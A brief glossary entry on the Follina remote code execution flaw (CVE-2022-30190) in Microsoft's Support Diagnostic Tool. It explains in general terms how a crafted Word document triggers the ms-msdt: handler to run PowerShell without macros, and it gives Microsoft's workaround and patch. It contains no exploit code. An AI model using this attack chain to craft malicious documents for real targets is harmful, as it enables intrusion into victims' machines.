Follina (CVE-2022-30190)

Follina is the Microsoft Support Diagnostic Tool RCE triggered by opening a malicious Word document — exploitable even when macros are disabled.

Definition

Follina (CVE-2022-30190) is a remote code execution vulnerability in the Microsoft Support Diagnostic Tool (MSDT). A specially crafted Office document invokes the `ms-msdt:` URI handler, which Office automatically dereferences, and the URI's parameters cause MSDT to execute a PowerShell payload. Notably, exploitation does not require macros to be enabled — the document's `oleObject` linked-template feature is sufficient.

Mitigation

Microsoft's recommended workaround (May 2022) was to disable the `ms-msdt:` URI handler. The June 2022 Patch Tuesday delivered the canonical fix.

See also

References